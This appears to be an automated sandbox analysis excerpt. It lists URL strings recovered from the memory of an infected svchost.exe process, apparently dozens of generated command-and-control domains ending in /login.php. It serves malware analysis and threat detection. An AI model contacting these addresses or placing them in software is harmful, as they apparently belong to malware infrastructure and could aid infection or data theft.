    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2810277870.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysynaj.com/login.php
    Source: svchost.exe, 00000001.00000003.2855136666.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855135066.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855945770.000000000BEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysysir.com/http://vowyrec.com/http://qexyhul.com/http://galyfez.com/
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636915993.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2640990048.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2628700713.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytyn.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvax.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2503661966.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793112586.000000000734D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysywon.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577542227.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2580215394.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysywyd.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxuj.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxux.com/
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxux.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyfux.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygon.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyjoj.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822377847.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815744203.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2527667087.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526244522.0000000007380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylod.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylod.com/login.phpcom/login.php
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylyx.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502330096.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506872369.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506229703.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505999102.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000735E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymir.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymun.com/login.php
    Source: svchost.exe, 00000001.00000003.2497617085.00000000072D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2501299413.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2783128435.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795645814.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2782047194.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2501750042.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2784404258.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502319167.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvynen.com/login.php
    Source: svchost.exe, 00000001.00000003.2811743937.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2521327598.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803526533.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808913849.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800699213.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809323268.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvysur.com/
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytan.com/login.php
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590376804.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589741784.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytud.com/login.php
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywar.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815952553.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822377847.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywux.com/login.php
    Source: svchost.exe, 00000001.00000003.2841115094.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxin.com/
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589741784.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxin.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfuj.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygax.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613424581.000000000734D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613994929.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygur.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612712767.000000000BE83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjod.com/login.php
    Source: svchost.exe, 00000001.00000003.2586486383.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2588833082.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585306164.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxylyj.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2709512878.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymin.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynir.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2782047194.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynyx.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysun.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysun.com/login.php8
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxytur.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyvoj.com/login.php
